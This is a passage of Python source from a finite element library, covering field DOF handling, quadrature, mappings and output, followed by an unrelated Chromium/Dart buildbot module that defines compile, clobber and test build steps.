integration : 'volume', 'surface', 'surface_extra', 'point' or 'custom'
The term integration type.
region_name : str
The name of the region of the integral.
Returns
-------
data_shape : 4 ints
The `(n_el, n_qp, dim, n_en)` for volume shape kind,
`(n_fa, n_qp, dim, n_fn)` for surface shape kind and
`(n_nod, 0, 0, 1)` for point shape kind.
Notes
-----
- `n_el`, `n_fa` = number of elements/facets
- `n_qp` = number of quadrature points per element/facet
- `dim` = spatial dimension
- `n_en`, `n_fn` = number of element/facet nodes
- `n_nod` = number of element nodes
"""
region = self.domain.regions[region_name]
shape = region.shape
dim = region.dim
if integration in ('surface', 'surface_extra'):
sd = self.surface_data[region_name]
# This works also for surface fields.
key = sd.face_type
weights = self.get_qp(key, integral).weights
n_qp = weights.shape[0]
if integration == 'surface':
data_shape = (sd.n_fa, n_qp, dim, sd.n_fp)
else:
data_shape = (sd.n_fa, n_qp, dim, self.econn.shape[1])
elif integration in ('volume', 'custom'):
_, weights = integral.get_qp(self.gel.name)
n_qp = weights.shape[0]
data_shape = (shape.n_cell, n_qp, dim, self.econn.shape[1])
elif integration == 'point':
dofs = self.get_dofs_in_region(region, merge=True)
data_shape = (dofs.shape[0], 0, 0, 1)
else:
raise NotImplementedError('unsupported integration! (%s)'
% integration)
return data_shape
def get_dofs_in_region(self, region, merge=True):
"""
Return indices of DOFs that belong to the given region and group.
"""
node_desc = self.node_desc
dofs = []
vdofs = nm.empty((0,), dtype=nm.int32)
if node_desc.vertex is not None:
vdofs = self.vertex_remap[region.vertices]
vdofs = vdofs[vdofs >= 0]
dofs.append(vdofs)
edofs = nm.empty((0,), dtype=nm.int32)
if node_desc.edge is not None:
edofs = self._get_facet_dofs(region.edges,
self.edge_remap,
self.edge_dofs)
dofs.append(edofs)
fdofs = nm.empty((0,), dtype=nm.int32)
if node_desc.face is not None:
fdofs = self._get_facet_dofs(region.faces,
self.face_remap,
self.face_dofs)
dofs.append(fdofs)
bdofs = nm.empty((0,), dtype=nm.int32)
if (node_desc.bubble is not None) and region.has_cells():
els = self.bubble_remap[region.cells]
bdofs = self.bubble_dofs[els[els >= 0]].ravel()
dofs.append(bdofs)
if merge:
dofs = nm.concatenate(dofs)
return dofs
def clear_qp_base(self):
"""
Remove cached quadrature points and base functions.
"""
self.qp_coors = {}
self.bf = {}
def get_qp(self, key, integral):
"""
Get quadrature points and weights corresponding to the given key
and integral. The key is 'v' or 's#', where # is the number of
face vertices.
"""
qpkey = (integral.order, key)
if qpkey not in self.qp_coors:
if (key[0] == 's') and not self.is_surface:
dim = self.gel.dim - 1
n_fp = self.gel.surface_facet.n_vertex
geometry = '%d_%d' % (dim, n_fp)
else:
geometry = self.gel.name
vals, weights = integral.get_qp(geometry)
self.qp_coors[qpkey] = Struct(vals=vals, weights=weights)
return self.qp_coors[qpkey]
def substitute_dofs(self, subs, restore=False):
"""
Perform facet DOF substitutions according to `subs`.
Modifies `self.econn` in-place and sets `self.econn0`,
`self.unused_dofs` and `self.basis_transform`.
"""
if restore and (self.stored_subs is not None):
self.econn0 = self.econn
self.econn, self.unused_dofs, basis_transform = self.stored_subs
else:
if subs is None:
self.econn0 = self.econn
return
else:
self.econn0 = self.econn.copy()
self._substitute_dofs(subs)
self.unused_dofs = nm.setdiff1d(self.econn0, self.econn)
basis_transform = self._eval_basis_transform(subs)
self.set_basis_transform(basis_transform)
def restore_dofs(self, store=False):
"""
Undoes the effect of :func:`FEField.substitute_dofs()`.
"""
if self.econn0 is None:
raise ValueError('no original DOFs to restore!')
if store:
self.stored_subs = (self.econn,
self.unused_dofs,
self.basis_transform)
else:
self.stored_subs = None
self.econn = self.econn0
self.econn0 = None
self.unused_dofs = None
self.basis_transform = None
def set_basis_transform(self, transform):
"""
Set local element basis transformation.
The basis transformation is applied in :func:`FEField.get_base()` and
:func:`FEField.create_mapping()`.
Parameters
----------
transform : array, shape `(n_cell, n_ep, n_ep)`
The array with `(n_ep, n_ep)` transformation matrices for each cell
in the field's region, where `n_ep` is the number of element DOFs.
"""
self.basis_transform = transform
def restore_substituted(self, vec):
"""
Restore values of the unused DOFs using the transpose of the applied
basis transformation.
"""
if (self.econn0 is None) or (self.basis_transform is None):
raise ValueError('no original DOF values to restore!!')
vec = vec.reshape((self.n_nod, self.n_components)).copy()
evec = vec[self.econn]
vec[self.econn0] = nm.einsum('cji,cjk->cik', self.basis_transform, evec)
return vec.ravel()
def get_base(self, key, derivative, integral, iels=None,
from_geometry=False, base_only=True):
qp = self.get_qp(key, integral)
if from_geometry:
ps = self.gel.poly_space
else:
ps = self.poly_space
_key = key if not from_geometry else 'g' + key
bf_key = (integral.order, _key, derivative)
if bf_key not in self.bf:
ori = self.ori
self.bf[bf_key] = ps.eval_base(qp.vals, diff=derivative, ori=ori,
transform=self.basis_transform)
bf = self.bf[bf_key]
if iels is not None and bf.ndim == 4:
bf = bf[iels]
if base_only:
return bf
else:
return bf, qp.weights
def create_bqp(self, region_name, integral):
gel = self.gel
sd = self.surface_data[region_name]
bqpkey = (integral.order, sd.bkey)
if not bqpkey in self.qp_coors:
qp = self.get_qp(sd.face_type, integral)
ps_s = self.gel.surface_facet.poly_space
bf_s = ps_s.eval_base(qp.vals)
coors, faces = gel.coors, gel.get_surface_entities()
vals = _interp_to_faces(coors, bf_s, faces)
self.qp_coors[bqpkey] = Struct(name='BQP_%s' % sd.bkey,
vals=vals, weights=qp.weights)
def extend_dofs(self, dofs, fill_value=None):
"""
Extend DOFs to the whole domain using the `fill_value`, or the
smallest value in `dofs` if `fill_value` is None.
"""
if fill_value is None:
if nm.isrealobj(dofs):
fill_value = get_min_value(dofs)
else:
# Complex values - treat real and imaginary parts separately.
fill_value = get_min_value(dofs.real)
fill_value += 1j * get_min_value(dofs.imag)
if self.approx_order != 0:
indx = self.get_vertices()
n_nod = self.domain.shape.n_nod
new_dofs = nm.empty((n_nod, dofs.shape[1]), dtype=self.dtype)
new_dofs.fill(fill_value)
new_dofs[indx] = dofs[:indx.size]
else:
new_dofs = extend_cell_data(dofs, self.domain, self.region,
val=fill_value)
return new_dofs
def remove_extra_dofs(self, dofs):
"""
Remove DOFs defined in higher order nodes (order > 1).
"""
if self.approx_order != 0:
new_dofs = dofs[:self.n_vertex_dof]
else:
new_dofs = dofs
return new_dofs
def linearize(self, dofs, min_level=0, max_level=1, eps=1e-4):
"""
Linearize the solution for post-processing.
Parameters
----------
dofs : array, shape (n_nod, n_component)
The array of DOFs reshaped so that each column corresponds
to one component.
min_level : int
The minimum required level of mesh refinement.
max_level : int
The maximum level of mesh refinement.
eps : float
The relative tolerance parameter of mesh adaptivity.
Returns
-------
mesh : Mesh instance
The adapted, nonconforming, mesh.
vdofs : array
The DOFs defined in vertices of `mesh`.
levels : array of ints
The refinement level used for each element group.
"""
assert_(dofs.ndim == 2)
n_nod, dpn = dofs.shape
assert_(n_nod == self.n_nod)
assert_(dpn == self.shape[0])
vertex_coors = self.coors[:self.n_vertex_dof, :]
ps = self.poly_space
gps = self.gel.poly_space
vertex_conn = self.econn[:, :self.gel.n_vertex]
eval_dofs = get_eval_dofs(dofs, self.econn, ps, ori=self.ori)
eval_coors = get_eval_coors(vertex_coors, vertex_conn, gps)
(level, coors, conn,
vdofs, mat_ids) = create_output(eval_dofs, eval_coors,
vertex_conn.shape[0], ps,
min_level=min_level,
max_level=max_level, eps=eps)
mesh = Mesh.from_data('linearized_mesh', coors, None, [conn], [mat_ids],
self.domain.mesh.descs)
return mesh, vdofs, level
def get_output_approx_order(self):
"""
Get the approximation order used in the output file.
"""
return min(self.approx_order, 1)
def create_output(self, dofs, var_name, dof_names=None,
key=None, extend=True, fill_value=None,
linearization=None):
"""
Convert the DOFs corresponding to the field to a dictionary of
output data usable by Mesh.write().
Parameters
----------
dofs : array, shape (n_nod, n_component)
The array of DOFs reshaped so that each column corresponds
to one component.
var_name : str
The variable name corresponding to `dofs`.
dof_names : tuple of str
The names of DOF components.
key : str, optional
The key to be used in the output dictionary instead of the
variable name.
extend : bool
Extend the DOF values to cover the whole domain.
fill_value : float or complex
The value used to fill the missing DOF values if `extend` is True.
linearization : Struct or None
The linearization configuration for higher order approximations.
Returns
-------
out : dict
The output dictionary.
"""
linearization = get_default(linearization, Struct(kind='strip'))
out = {}
if linearization.kind is None:
out[key] = Struct(name='output_data', mode='full',
data=dofs, var_name=var_name,
dofs=dof_names, field_name=self.name)
elif linearization.kind == 'strip':
if extend:
ext = self.extend_dofs(dofs, fill_value)
else:
ext = self.remove_extra_dofs(dofs)
if ext is not None:
approx_order = self.get_output_approx_order()
if approx_order != 0:
# Has vertex data.
out[key] = Struct(name='output_data', mode='vertex',
data=ext, var_name=var_name,
dofs=dof_names)
else:
ext.shape = (ext.shape[0], 1, ext.shape[1], 1)
out[key] = Struct(name='output_data', mode='cell',
data=ext, var_name=var_name,
dofs=dof_names)
else:
mesh, vdofs, levels = self.linearize(dofs,
linearization.min_level,
linearization.max_level,
linearization.eps)
out[key] = Struct(name='output_data', mode='vertex',
data=vdofs, var_name=var_name, dofs=dof_names,
mesh=mesh, levels=levels)
out = convert_complex_output(out)
return out
def create_mesh(self, extra_nodes=True):
"""
Create a mesh from the field region, optionally including the field
extra nodes.
"""
mesh = self.domain.mesh
if self.approx_order != 0:
if extra_nodes:
conn = self.econn
else:
conn = self.econn[:, :self.gel.n_vertex]
conns = [conn]
mat_ids = [mesh.cmesh.cell_groups]
descs = mesh.descs[:1]
if extra_nodes:
coors = self.coors
else:
coors = self.coors[:self.n_vertex_dof]
mesh = Mesh.from_data(self.name, coors, None, conns,
mat_ids, descs)
return mesh
def get_evaluate_cache(self, cache=None, share_geometry=False,
verbose=False):
"""
Get the evaluate cache for :func:`Variable.evaluate_at()
<sfepy.discrete.variables.Variable.evaluate_at()>`.
Parameters
----------
cache : Struct instance, optional
Optionally, use the provided instance to store the cache data.
share_geometry : bool
Set to True to indicate that all the evaluations will work on the
same region. Certain data are then computed only for the first
probe and cached.
verbose : bool
If False, reduce verbosity.
Returns
-------
cache : Struct instance
The evaluate cache.
"""
try:
from scipy.spatial import cKDTree as KDTree
except ImportError:
from scipy.spatial import KDTree
from sfepy.discrete.fem.geometry_element import create_geometry_elements
if cache is None:
cache = Struct(name='evaluate_cache')
timer = Timer(start=True)
if (cache.get('cmesh', None) is None) or not share_geometry:
mesh = self.create_mesh(extra_nodes=False)
cache.cmesh = cmesh = mesh.cmesh
gels = create_geometry_elements()
cmesh.set_local_entities(gels)
cmesh.setup_entities()
cache.centroids = cmesh.get_centroids(cmesh.tdim)
if self.gel.name != '3_8':
cache.normals0 = cmesh.get_facet_normals()
cache.normals1 = None
else:
cache.normals0 = cmesh.get_facet_normals(0)
cache.normals1 = cmesh.get_facet_normals(1)
output('cmesh setup: %f s' % timer.stop(), verbose=verbose)
timer.start()
if (cache.get('kdtree', None) is None) or not share_geometry:
cache.kdtree = KDTree(cmesh.coors)
output('kdtree: %f s' % timer.stop(), verbose=verbose)
return cache
def interp_to_qp(self, dofs):
"""
Interpolate DOFs into quadrature points.
The quadrature order is given by the field approximation order.
Parameters
----------
dofs : array
The array of DOF values of shape `(n_nod, n_component)`.
Returns
-------
data_qp : array
The values interpolated into the quadrature points.
integral : Integral
The corresponding integral defining the quadrature points.
"""
integral = Integral('i', order=self.approx_order)
bf = self.get_base('v', False, integral)
bf = bf[:,0,:].copy()
data_qp = nm.dot(bf, dofs[self.econn])
data_qp = nm.swapaxes(data_qp, 0, 1)
data_qp.shape = data_qp.shape + (1,)
return data_qp, integral
def get_coor(self, nods=None):
"""
Get coordinates of the field nodes.
Parameters
----------
nods : array, optional
The indices of the required nodes. If not given, the
coordinates of all the nodes are returned.
"""
if nods is None:
return self.coors
else:
return self.coors[nods]
def get_connectivity(self, region, integration, is_trace=False):
"""
Convenience alias to `Field.get_econn()`, that is used in some terms.
"""
return self.get_econn(integration, region, is_trace=is_trace)
def create_mapping(self, region, integral, integration,
return_mapping=True):
"""
Create a new reference mapping.
Compute jacobians, element volumes and base function derivatives
for Volume-type geometries (volume mappings), and jacobians,
normals and base function derivatives for Surface-type
geometries (surface mappings).
Notes
-----
- surface mappings are defined on the surface region
- surface mappings require field order to be > 0
"""
domain = self.domain
coors = domain.get_mesh_coors(actual=True)
dconn = domain.get_conn()
tco = integration in ('volume', 'custom')
iels = region.get_cells(true_cells_only=tco)
transform = (self.basis_transform[iels] if self.basis_transform
is not None else None)
if integration == 'volume':
qp = self.get_qp('v', integral)
geo_ps = self.gel.poly_space
ps = self.poly_space
bf = self.get_base('v', 0, integral, iels=iels)
conn = nm.take(dconn, iels.astype(nm.int32), axis=0)
mapping = VolumeMapping(coors, conn, poly_space=geo_ps)
vg = mapping.get_mapping(qp.vals, qp.weights, poly_space=ps,
ori=self.ori, transform=transform)
out = vg
elif (integration == 'surface') or (integration == 'surface_extra'):
assert_(self.approx_order > 0)
if self.ori is not None:
msg = 'surface integrals do not work yet with the' \
' hierarchical basis!'
raise ValueError(msg)
if self.basis_transform is not None:
msg = 'surface integrals do not work with the' \
' basis transform!'
raise ValueError(msg)
sd = domain.surface_groups[region.name]
esd = self.surface_data[region.name]
geo_ps = self.gel.poly_space
ps = self.poly_space
conn = sd.get_connectivity()
mapping = SurfaceMapping(coors, conn, poly_space=geo_ps)
if not self.is_surface:
self.create_bqp(region.name, integral)
qp = self.qp_coors[(integral.order, esd.bkey)]
abf = ps.eval_base(qp.vals[0], transform=transform)
bf = abf[..., self.efaces[0]]
indx = self.gel.get_surface_entities()[0]
# Fix geometry element's 1st facet orientation for gradients.
indx = nm.roll(indx, -1)[::-1]
mapping.set_basis_indices(indx)
sg = mapping.get_mapping(qp.vals[0], qp.weights,
poly_space=Struct(n_nod=bf.shape[-1]),
mode=integration)
if integration == 'surface_extra':
sg.alloc_extra_data(self.econn.shape[1])
bf_bg = geo_ps.eval_base(qp.vals, diff=True)
ebf_bg = self.get_base(esd.bkey, 1, integral)
sg.evaluate_bfbgm(bf_bg, ebf_bg, coors, sd.fis, dconn)
else:
if self.basis_transform is not None:
msg = 'surface fields do not work with the' \
' basis transform!'
raise ValueError(msg)
# Do not use BQP for surface fields.
qp = self.get_qp(sd.face_type, integral)
bf = ps.eval_base(qp.vals, transform=transform)
sg = mapping.get_mapping(qp.vals, qp.weights,
poly_space=Struct(n_nod=bf.shape[-1]),
mode=integration)
out = sg
elif integration == 'point':
out = mapping = None
elif integration == 'custom':
raise ValueError('cannot create custom mapping!')
else:
raise ValueError('unknown integration geometry type: %s'
% integration)
if out is not None:
# Store the integral used.
out.integral = integral
out.qp = qp
out.ps = ps
# Update base.
out.bf[:] = bf
if return_mapping:
out = (out, mapping)
return out
class VolumeField(FEField):
"""
Finite element field base class over volume elements (element dimension
equals space dimension).
"""
def _check_region(self, region):
"""
Check whether the `region` can be used for the
field.
Returns
-------
ok : bool
True if the region is usable for the field.
"""
ok = True
domain = region.domain
if region.kind != 'cell':
output("bad region kind! (is: %r, should be: 'cell')"
% region.kind)
ok = False
elif (region.kind_tdim != domain.shape.tdim):
output('cells with a bad topological dimension! (%d == %d)'
% (region.kind_tdim, domain.shape.tdim))
ok = False
return ok
def _setup_geometry(self):
"""
Setup the field region geometry.
"""
cmesh = self.domain.cmesh
for key, gel in six.iteritems(self.domain.geom_els):
ct = cmesh.cell_types
if (ct[self.region.cells] == cmesh.key_to_index[gel.name]).all():
self.gel = gel
break
else:
raise ValueError('region %s of field %s contains multiple'
' reference geometries!'
% (self.region.name, self.name))
self.is_surface = False
def _create_interpolant(self):
name = '%s_%s_%s_%d%s' % (self.gel.name, self.space,
self.poly_space_base, self.approx_order,
'B' * self.force_bubble)
ps = PolySpace.any_from_args(name, self.gel, self.approx_order,
base=self.poly_space_base,
force_bubble=self.force_bubble)
self.poly_space = ps
def _init_econn(self):
"""
Initialize the extended DOF connectivity.
"""
n_ep = self.poly_space.n_nod
n_cell = self.region.get_n_cells()
self.econn = nm.zeros((n_cell, n_ep), nm.int32)
def _setup_vertex_dofs(self):
"""
Setup vertex DOF connectivity.
"""
if self.node_desc.vertex is None:
return 0, None
region = self.region
cmesh = self.domain.cmesh
conn, offsets = cmesh.get_incident(0, region.cells, region.tdim,
ret_offsets=True)
vertices = nm.unique(conn)
remap = prepare_remap(vertices, region.n_v_max)
n_dof = vertices.shape[0]
aux = nm.unique(nm.diff(offsets))
assert_(len(aux) == 1, 'region with multiple reference geometries!')
offset = aux[0]
# Remap vertex node connectivity to field-local numbering.
aux = conn.reshape((-1, offset)).astype(nm.int32)
self.econn[:, :offset] = nm.take(remap, aux)
return n_dof, remap
def setup_extra_data(self, geometry, info, is_trace):
dct = info.dc_type.type
if geometry != None:
geometry_flag = 'surface' in geometry
else:
geometry_flag = False
if (dct == 'surface') or (geometry_flag):
reg = info.get_region()
mreg_name = info.get_region_name(can_trace=False)
self.domain.create_surface_group(reg)
self.setup_surface_data(reg, is_trace, mreg_name)
elif dct == 'edge':
raise NotImplementedError('dof connectivity type %s' % dct)
elif dct == 'point':
self.setup_point_data(self, info.region)
elif dct not in ('volume', 'scalar', 'custom'):
raise ValueError('unknown dof connectivity type! (%s)' % dct)
def setup_point_data(self, field, region):
if region.name not in self.point_data:
conn = field.get_dofs_in_region(region, merge=True)
conn.shape += (1,)
self.point_data[region.name] = conn
def setup_surface_data(self, region, is_trace=False, trace_region=None):
"""nodes[leconn] == econn"""
"""nodes are sorted by node number -> same order as region.vertices"""
if region.name not in self.surface_data:
sd = FESurface('surface_data_%s' % region.name, region,
self.efaces, self.econn, self.region)
self.surface_data[region.name] = sd
if region.name in self.surface_data and is_trace:
sd = self.surface_data[region.name]
sd.setup_mirror_connectivity(region, trace_region)
return self.surface_data[region.name]
def get_econn(self, conn_type, region, is_trace=False, integration=None):
"""
Get extended connectivity of the given type in the given region.
"""
ct = conn_type.type if isinstance(conn_type, Struct) else conn_type
if ct in ('volume', 'custom'):
if region.name == self.region.name:
conn = self.econn
else:
tco = integration in ('volume', 'custom')
cells = region.get_cells(true_cells_only=tco)
ii = self.region.get_cell_indices(cells, true_cells_only=tco)
conn = nm.take(self.econn, ii, axis=0)
elif ct == 'surface':
sd = self.surface_data[region.name]
conn = sd.get_connectivity(is_trace=is_trace)
elif ct == 'edge':
raise NotImplementedError('connectivity type %s' % ct)
elif ct == 'point':
conn = self.point_data[region.name]
else:
raise ValueError('unknown connectivity type! (%s)' % ct)
return conn
def average_qp_to_vertices(self, data_qp, integral):
"""
Average data given in quadrature points in region elements into
region vertices.
.. math::
u_n = \sum_e (u_{e,avg} * volume_e) / \sum_e volume_e
= \sum_e \int_{volume_e} u / \sum volume_e
"""
region = self.region
n_cells = region.get_n_cells()
if n_cells != data_qp.shape[0]:
msg = 'incomatible shape! (%d == %d)' % (n_cells,
data_qp.shape[0])
raise ValueError(msg)
n_vertex = self.n_vertex_dof
nc = data_qp.shape[2]
nod_vol = nm.zeros((n_vertex,), dtype=nm.float64)
data_vertex = nm.zeros((n_vertex, nc), dtype=nm.float64)
vg = self.get_mapping(self.region, integral, 'volume')[0]
volume = nm.squeeze(vg.volume)
iels = self.region.get_cells()
data_e = nm.zeros((volume.shape[0], 1, nc, 1), dtype=nm.float64)
vg.integrate(data_e, data_qp[iels])
ir = nm.arange(nc, dtype=nm.int32)
conn = self.econn[:, :self.gel.n_vertex]
for ii, cc in enumerate(conn):
# Assumes unique nodes in cc!
ind2, ind1 = nm.meshgrid(ir, cc)
data_vertex[ind1,ind2] += data_e[iels[ii],0,:,0]
nod_vol[cc] += volume[ii]
data_vertex /= nod_vol[:,nm.newaxis]
return data_vertex
class SurfaceField(FEField):
"""
Finite element field base class over surface (element dimension is one
less than space dimension).
"""
def _check_region(self, region):
"""
Check whether the `region` can be used for the
field.
Returns
-------
ok : bool
True if the region is usable for the field.
"""
ok1 = ((region.kind_tdim == (region.tdim - 1))
and (region.get_n_cells(True) > 0))
if not ok1:
output('bad region topological dimension and kind! (%d, %s)'
% (region.tdim, region.kind))
n_ns = region.get_facet_indices().shape[0] - region.get_n_cells(True)
ok2 = n_ns == 0
if not ok2:
output('%d region facets are not on the domain surface!' % n_ns)
return ok1 and ok2
def _setup_geometry(self):
"""
Setup the field region geometry.
"""
for key, vgel in six.iteritems(self.domain.geom_els):
self.gel = vgel.surface_facet
break
if self.gel is None:
raise ValueError('cells with no surface!')
self.is_surface = True
def _create_interpolant(self):
name = '%s_%s_%s_%d%s' % (self.gel.name, self.space,
self.poly_space_base, self.approx_order,
'B' * self.force_bubble)
ps = PolySpace.any_from_args(name, self.gel, self.approx_order,
base=self.poly_space_base,
force_bubble=self.force_bubble)
self.poly_space = ps
def setup_extra_data(self, geometry, info, is_trace):
dct = info.dc_type.type
if dct != 'surface':
msg = "dof connectivity type must be 'surface'! (%s)" % dct
raise ValueError(msg)
reg = info.get_region()
if reg.name not in self.surface_data:
# Defined in setup_vertex_dofs()
msg = 'no surface data of surface field! (%s)' % reg.name
raise ValueError(msg)
if reg.name in self.surface_data and is_trace:
sd = self.surface_data[reg.name]
mreg_name = info.get_region_name(can_trace=False)
sd.setup_mirror_connectivity(reg, mreg_name)
def _init_econn(self):
"""
Initialize the extended DOF connectivity.
"""
n_ep = self.poly_space.n_nod
n_cell = self.region.get_n_cells(is_surface=self.is_surface)
self.econn = nm.zeros((n_cell, n_ep), nm.int32)
def _setup_vertex_dofs(self):
"""
Setup vertex DOF connectivity.
"""
if self.node_desc.vertex is None:
return 0, None
region = self.region
remap = prepare_remap(region.vertices, region.n_v_max)
n_dof = region.vertices.shape[0]
# Remap vertex node connectivity to field-local numbering.
conn, gel = self.domain.get_conn(ret_gel=True)
faces = gel.get_surface_entities()
aux = FESurface('aux', region, faces, conn)
self.econn[:, :aux.n_fp] = aux.leconn
self.surface_data[region.name] = aux
return n_dof, remap
def _setup_bubble_dofs(self):
"""
Setup bubble DOF connectivity.
"""
return 0, None, None
def get_econn(self, conn_type, region, is_trace=False,
integration=None):
"""
Get extended connectivity of the given type in the given region.
"""
ct = conn_type.type if isinstance(conn_type, Struct) else conn_type
if ct != 'surface':
msg = 'connectivity type must be "surface"! (%s)' % ct
raise ValueError(msg)
sd = self.surface_data[region.name]
conn = sd.get_connectivity(local=True, is_trace=is_trace)
return conn
def average_qp_to_vertices(self, data_qp, integral):
"""
Average data given in quadrature points in region elements into
region vertices.
.. math::
u_n = \sum_e (u_{e,avg} * area_e) / \sum_e area_e
= \sum_e \int_{area_e} u / \sum area_e
"""
region = self.region
n_cells = region.get_n_cells(True)
if n_cells != data_qp.shape[0]:
msg = 'incomatible shape! (%d == %d)' % (n_cells,
data_qp.shape[0])
raise ValueError(msg)
n_vertex = len(region.vertices)
nc = data_qp.shape[2]
nod_vol = nm.zeros((n_vertex,), dtype=nm.float64)
data_vertex = nm.zeros((n_vertex, nc), dtype=nm.float64)
sg = self.get_mapping(self.region, integral, 'surface')[0]
area = nm.squeeze(sg.volume)
n_cells = region.get_n_cells(True)
iels = nm.arange(n_cells, dtype=nm.int32)
data_e = nm.zeros((area.shape[0], 1, nc, 1), dtype=nm.float64)
sg.integrate(data_e, data_qp[iels])
ir = nm.arange(nc, dtype=nm.int32)
sd = self.domain.surface_groups[region.name]
# Should be vertex connectivity!
conn = sd.get_connectivity(local=True)
for ii, cc in enumerate(conn):
# Assumes unique nodes in cc!
ind2, ind1 = nm.meshgrid(ir, cc)
data_vertex[ind1,ind2] += data_e[iels[ii],0,:,0]
nod_vol[cc] += area[ii]
data_vertex /= nod_vol[:,nm.newaxis]
return data_vertex
class H1Mixin(Struct):
"""
Methods of fields specific to H1 space.
"""
def _setup_shape(self):
"""
Setup the field's shape-related attributes, see :class:`Field`.
"""
self.n_components = nm.prod(self.shape)
self.val_shape = self.shape
|
#!/usr/bin/python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Set of utilities to add commands to a buildbot factory.
Contains the Dart specific commands. Based on commands.py
"""
from buildbot.steps import shell
from buildbot.process.properties import WithProperties
from master import chromium_step
from master.factory import commands
class DartCommands(commands.FactoryCommands):
"""Encapsulates methods to add dart commands to a buildbot factory."""
logfiles = {
"flakylog": ".flaky.log",
"debuglog": ".debug.log",
"testoutcomelog": ".test-outcome.log",
}
standard_flags = "--write-debug-log --write-test-outcome-log"
def __init__(self, factory=None, target=None, build_dir=None,
target_platform=None, env=None):
commands.FactoryCommands.__init__(self, factory, target, build_dir,
target_platform)
# Two additional directories up compared to normal chromium scripts due
# to using runtime as runtime dir inside dart directory inside
# build directory.
self._script_dir = self.PathJoin('..', self._script_dir)
self._tools_dir = self.PathJoin('tools')
# Where the chromium slave scripts are.
self._chromium_script_dir = self.PathJoin(self._script_dir, 'chromium')
self._private_script_dir = self.PathJoin(self._script_dir, '..', 'private')
self._slave_dir = self.PathJoin(self._script_dir,
'..', '..', '..',
'build', 'scripts',
'slave', 'dart')
self._dart_util = self.PathJoin(self._slave_dir, 'dart_util.py')
self._dart_build_dir = self.PathJoin('build', 'dart')
self._repository_root = ''
self._custom_env = env or {}
def AddMaybeClobberStep(self, clobber, options=None, timeout=1200):
"""Possibly clobber.
Either clobber unconditionally (e.g. nuke-and-pave builder, set at
factory build time), or at runtime (clobber checkbox). If the
former, the clobber arg is set. If the latter, we use a buildbot
Properties object.
TODO(jrg); convert into a doStepIf with a closure referencing
step.build.getProperties(). E.g.
http://permalink.gmane.org/gmane.comp.python.buildbot.devel/6039
"""
options = options or {}
clobber_cmd = [self._python, self._dart_util]
clobber_cmd.append(WithProperties('%(clobber:+--clobber)s'))
workdir = self._dart_build_dir
self._factory.addStep(shell.ShellCommand,
name='maybe clobber',
description='maybe clobber',
timeout=timeout,
haltOnFailure=True,
workdir=workdir,
command=clobber_cmd)
# pylint: disable=W0221
def AddCompileStep(self, options=None, timeout=1200):
options = options or {}
cmd = 'python ' + self._tools_dir + '/build.py --mode=%s' % \
(options['mode'])
workdir = self._dart_build_dir
is_dartc = (options.get('name') != None and
options.get('name').startswith('dartc'))
is_dart2dart = (options.get('name') != None and
options.get('name').startswith('dart2dart'))
is_new_analyzer = (options.get('name') != None and
options.get('name').startswith('new_analyzer'))
is_analyzer_experimental = (options.get('name') != None and
options.get('name')
.startswith('analyzer_experimental'))
is_vm = not (is_dartc or is_dart2dart or is_new_analyzer or
is_analyzer_experimental)
if is_vm:
cmd += ' --arch=%s' % (options['arch'])
cmd += ' runtime'
elif is_dart2dart:
cmd += ' dart2dart_bot'
elif is_dartc and options['mode'] == 'debug':
# For dartc we always do a full build, except for debug mode
# where we will time out doing api docs.
cmd += ' dartc_bot'
else:
# We don't specify a specific target (i.e. we build the all target)
pass
self._factory.addStep(shell.ShellCommand,
name='build',
description='build',
timeout=timeout,
env = self._custom_env,
haltOnFailure=True,
workdir=workdir,
command=cmd)
def AddKillStep(self, step_name='Kill leftover process'):
cmd = 'python ' + self._tools_dir + '/task_kill.py --kill_browsers=True'
self._factory.addStep(shell.ShellCommand,
name='Taskkill',
description=step_name,
env = self._custom_env,
haltOnFailure=False,
workdir=self._dart_build_dir,
command=cmd)
def AddArchiveCoredumps(self, options=None, step_name='Archive coredumps'):
options = options or {}
if (options.get('name') != None and
options.get('name').startswith('vm')):
cmd = 'python ' + self._tools_dir + '/archive_crash.py'
self._factory.addStep(shell.ShellCommand,
name='ArchiveCore',
description=step_name,
env = self._custom_env,
haltOnFailure=False,
workdir=self._dart_build_dir,
command=cmd)
def AddAnalyzerTests(self, options, name, timeout):
compiler = 'dartanalyzer'
if name.startswith('analyzer_experimental'):
compiler = 'dart2analyzer'
cmd = ('python ' + self._tools_dir + '/test.py '
' --progress=line --report --time --mode=%s --arch=%s '
' --compiler=%s --runtime=none --failure-summary %s'
) % (options['mode'], options['arch'], compiler,
self.standard_flags)
self._factory.addStep(shell.ShellCommand,
name='tests',
description='tests',
timeout=timeout,
env = self._custom_env,
haltOnFailure=False,
workdir=self._dart_build_dir,
command=cmd,
logfiles=self.logfiles,
lazylogfiles=True)
def AddDart2dartTests(self, options, timeout):
shards = options.get('shards') or 1
shard = options.get('shard') or 1
cmd = ('python ' + self._tools_dir + '/test.py '
' --progress=buildbot --report --time --mode=%s --arch=%s '
' --compiler=dart2dart --shards=%s --shard=%s %s'
) % (options['mode'], options['arch'], shards, shard,
self.standard_flags)
self._factory.addStep(shell.ShellCommand,
name='tests',
description='tests',
timeout=timeout,
env = self._custom_env,
haltOnFailure=False,
workdir=self._dart_build_dir,
command=cmd,
logfiles=self.logfiles,
lazylogfiles=True)
cmd += ' --minified'
self._factory.addStep(shell.ShellCommand,
name='minified tests',
description='minified tests',
timeout=timeout,
env = self._custom_env,
haltOnFailure=False,
workdir=self._dart_build_dir,
command=cmd,
logfiles=self.logfiles,
lazylogfiles=True)
def AddVMTests(self, options, timeout):
cmd = ('python ' + self._tools_dir + '/test.py '
' --progress=line --report --time --mode=%s --arch=%s '
'--compiler=none --runtime=vm --failure-summary %s '
'--copy-coredumps'
) % (options['mode'], options['arch'], self.standard_flags)
vm_options = options.get('vm_options')
if vm_options:
cmd += ' --vm-options=%s' % vm_options
if options.get('flags') != None:
cmd += options.get('flags')
checked_config = options.get('checked_config', 'both')
if checked_config == 'unchecked' or checked_config == 'both':
self._factory.addStep(shell.ShellCommand,
name='tests',
description='tests',
timeout=timeout,
env = self._custom_env,
haltOnFailure=False,
workdir=self._dart_build_dir,
command=cmd,
logfiles=self.logfiles,
lazylogfiles=True)
if checked_config == 'checked' or checked_config == 'both':
cmd += ' --checked'
self._factory.addStep(shell.ShellCommand,
name='checked_tests',
description='checked_tests',
timeout=timeout,
env = self._custom_env,
haltOnFailure=False,
workdir=self._dart_build_dir,
command=cmd,
logfiles=self.logfiles,
lazylogfiles=True)
